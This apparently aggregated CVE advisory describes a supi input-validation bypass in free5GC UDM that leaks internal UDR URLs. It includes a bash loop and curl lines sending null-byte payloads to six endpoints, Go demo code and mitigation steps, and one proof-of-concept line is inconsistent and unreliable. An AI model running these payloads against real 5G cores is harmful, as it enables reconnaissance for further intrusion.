How the mentioned CVE works:
The free5GC UDM's `nudm-sdm` service fails to validate the `supi` path parameter in six GET handlers: HandleGetSmfSelectData, HandleGetSupi, HandleGetTraceData, HandleGetUeContextInSmfData, HandleGetNssai, and HandleGetSmData. Unlike `HandleGetAmData`, which calls validator.IsValidSupi(), these handlers pass the attacker-controlled `supi` directly to the processor. The processor builds a URL to forward the request to the UDR (e.g., `http://udr.internal:80/nudr-dr/v2/subscription-data/{supi}/...`). When an unauthenticated request carries a `supi` containing a control character such as a null byte (%00), Go's `net/url` parser rejects the constructed URL as containing an invalid control character, and the UDM answers with a `500 Internal Server Error` whose `detail` field leaks the full internal UDR URL (host, port, API version, path structure).

This is a missed fix from CVE-2026-27642, which originally patched only the authentication handlers (HandleConfirmAuth and HandleGenerateAuthData).

Affected endpoints: GET /{supi}/smf-select-data, GET /{supi}, GET /{supi}/trace-data, GET /{supi}/ue-context-in-smf-data, GET /{supi}/nssai, GET /{supi}/sm-data.

Proof-of-concept: `curl "http://udr.internal:80/nudr-dr/v2/subscription-data/imsi-22277\x00INJECTED//provisioned-data/…`. The already-protected endpoint (HandleGetAmData) returns 400 instead. No patch is available as of v1.4.2.
dailycve form:
Platform: free5GC UDM
Version: <= v1.4.2
Vulnerability: Input validation bypass
Severity: Medium
Date: 2026-05-07
Prediction: 30 days post-disclosure
What Undercode Say:
# Test all six vulnerable endpoints (the empty entry covers GET /{supi} itself)
for endpoint in "smf-select-data" "trace-data" "ue-context-in-smf-data" "nssai" "sm-data" ""; do
    if [ -z "$endpoint" ]; then
        curl -s "http://target/nudm-sdm/v2/imsi-22277%00INJECTED"
    else
        curl -s "http://target/nudm-sdm/v2/imsi-22277%00INJECTED/$endpoint"
    fi
done | grep -o 'http://[^"]*'
Code snippet of missing validation (internal/sbi/api_subscriberdatamanagement.go):
Vulnerable handler (the `supi` path parameter reaches the processor unvalidated):
    supi := c.Params.ByName("supi")
    s.Processor().GetSmfSelectDataProcedure(c, supi, plmnID, supportedFeatures)
Fixed version (validate `supi` before it reaches the processor, as HandleGetAmData already does):
    supi := c.Params.ByName("supi")
    if !validator.IsValidSupi(supi) {
        // problemDetail: a ProblemDetails body with status 400 and a generic cause, never the internal URL
        c.JSON(http.StatusBadRequest, problemDetail)
        return
    }
    s.Processor().GetSmfSelectDataProcedure(c, supi, plmnID, supportedFeatures)
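As an added example that is not free5GC's own code, the following Go program reproduces the failure mode in `net/url` described above and sets it beside a hardened flow that validates `supi` first; the UDR base URL and sub-path, the `ProblemDetails` struct and the IMSI regex are assumptions taken from this page, and `IsValidSupi` here only stands in for free5GC's `validator.IsValidSupi()`.

```go
package main

import (
	"fmt"
	"net/url"
	"regexp"
)

// ProblemDetails is a minimal stand-in for the 3GPP ProblemDetails body (assumed).
type ProblemDetails struct {
	Status        int
	Cause, Detail string
}

// Assumed UDR base URL and sub-path; the real ones come from free5GC's configuration.
const udrBase = "http://udr.internal:80/nudr-dr/v2/subscription-data"

// supiPattern is the regex this page recommends; an assumption standing in for validator.IsValidSupi.
var supiPattern = regexp.MustCompile(`^imsi-[0-9]{15}$`)

func IsValidSupi(supi string) bool { return supiPattern.MatchString(supi) }

// BuildUDRURLUnchecked mirrors the vulnerable flow: supi goes straight into the UDR URL.
// A control byte makes url.Parse fail, and its error quotes the whole URL (the leaked `detail`).
func BuildUDRURLUnchecked(supi string) (string, error) {
	u, err := url.Parse(fmt.Sprintf("%s/%s/provisioned-data", udrBase, supi))
	if err != nil {
		return "", err // message contains host, port and the full internal path
	}
	return u.String(), nil
}

// BuildUDRURLChecked is the hardened flow: reject a malformed supi with a generic 400
// before any URL is built, and never echo url.Parse's error text to the client.
func BuildUDRURLChecked(supi string) (string, *ProblemDetails) {
	if !IsValidSupi(supi) {
		return "", &ProblemDetails{Status: 400, Cause: "INVALID_PARAM", Detail: "invalid supi"}
	}
	u, err := url.Parse(fmt.Sprintf("%s/%s/provisioned-data", udrBase, supi))
	if err != nil { // unreachable for a validated supi; keep the detail generic anyway
		return "", &ProblemDetails{Status: 500, Cause: "SYSTEM_FAILURE", Detail: "internal error"}
	}
	return u.String(), nil
}

func main() {
	_, err := BuildUDRURLUnchecked("imsi-22277\x00INJECTED")
	fmt.Println(err) // the parse error quotes http://udr.internal:80/... in full
}
```

Running it prints the parse error for the unchecked path, which quotes the full internal URL, while the checked path returns only a generic 400 ProblemDetails.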
Exploit:
An unauthenticated attacker sends a GET request to any vulnerable endpoint with a `supi` containing a control character (e.g., null byte %00 or carriage return %0d). Example: curl "http://192.168.1.100/nudm-sdm/v2/imsi-12345%00exploit/smf-select-data". The server responds with HTTP 500 and a JSON `detail` field leaking the internal UDR URL, e.g. "parse \"http://udr.internal:8080/nudr-dr/v2/subscription-data/imsi-12345\x00exploit//...\": invalid control character". No authentication is required.
Protection from this CVE:
- Apply the missing `validator.IsValidSupi()` check to all six handlers, following the `HandleGetAmData` pattern.
- Deploy a WAF rule to reject `supi` parameters containing control characters (\x00-\x1f).
- Disable detailed error messages in production (set debug=false).
- Until a patch is available, patch the source manually or use a reverse proxy to validate `supi` against the regex ^imsi-[0-9]{15}$.
- Monitor logs for 500 errors containing the keywords `parse` or `control character`.
Impact:
Information disclosure of internal infrastructure: UDR hostname/port, full API path (/nudr-dr/v2/subscription-data/...), UDR API version, and internal service naming conventions. This intelligence enables further attacks against the UDR (e.g., CVE-2026-27642 variants, privilege escalation, data exfiltration) and other 5G core components. No authentication is required, and the issue is exploitable remotely over the network.
Sources:
Reported By: github.com